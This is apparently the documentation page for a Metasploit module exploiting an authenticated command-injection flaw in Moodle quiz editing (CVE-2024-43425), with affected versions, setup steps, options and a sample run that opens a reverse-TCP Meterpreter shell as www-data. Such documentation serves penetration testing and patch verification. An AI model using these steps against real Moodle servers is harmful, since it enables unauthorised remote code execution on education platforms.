adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c70043f84286ed1eff7da2fef5dd7f2122b81663
metasploit-gs/documentation/modules/exploit/linux/http/moodle_rce.md
T
h4x-x0r c82b8217a8 CVE-2024-6670 
CVE-2024-6670
2024-09-01 23:26:11 +01:00

3.6 KiB
Raw Blame History

Vulnerable Application

This module exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.

Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include Teacher and Administrator, but might differ depending on the specific deployment and configuration.

Affected versions include:

  • 4.4 to 4.4.1
  • 4.3 to 4.3.5
  • 4.2 to 4.2.8
  • 4.1 to 4.1.11

Moodle published an advisory here.

The original advisory is available here, and a more detailed writeup is available here.

Testing

Legacy releases from Moodle can be obtained from here. An installation guide is available here.

Successfully tested on

  • Moodle v4.4.1 on Ubuntu 20.04 LTS

Verification Steps

  1. Deploy Moodle
  2. Start msfconsole
  3. use exploit/linux/http/moodle_rce
  4. set USERNAME <USER>
  5. set PASSWORD <PASSWORD>
  6. set CMID <ID>
  7. set COURSEID <ID>
  8. set RHOSTS <IP>
  9. set LHOST <IP>
  10. exploit

Options

USERNAME

The username to authenticate with in Moodle.

PASSWORD

The password for the user.

CMID

The course module ID. Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course (e.g., IP>/moodle/mod/quiz/edit.php?cmid=4).

COURSEID

The course ID. Can be retrieved from the URL when the course is selected (e.g., /moodle/course/view.php?id=3).

Scenarios

Running the module against Moodle v4.4.1 should result in an output similar to the following:

msf6 > use exploit/linux/http/moodle_rce 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/moodle_rce) > set USERNAME testuser
USERNAME => testuser
msf6 exploit(linux/http/moodle_rce) > set PASSWORD iusldbf843498fKJASD
PASSWORD => iusldbf843498fKJASD
msf6 exploit(linux/http/moodle_rce) > set CMID 2
CMID => 2
msf6 exploit(linux/http/moodle_rce) > set COURSEID 2
COURSEID => 2
msf6 exploit(linux/http/moodle_rce) > set RHOSTS 192.168.217.141
RHOSTS => 192.168.217.141
msf6 exploit(linux/http/moodle_rce) > set LHOST 192.168.217.128
LHOST => 192.168.217.128
msf6 auxiliary(exploit/linux/http/moodle_rce) > exploit 
[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as testuser...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 192.168.217.141
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/moodle_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.217.141
OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
  
meterpreter > getuid 
Server username: www-data
Reference in New Issue View Git Blame Copy Permalink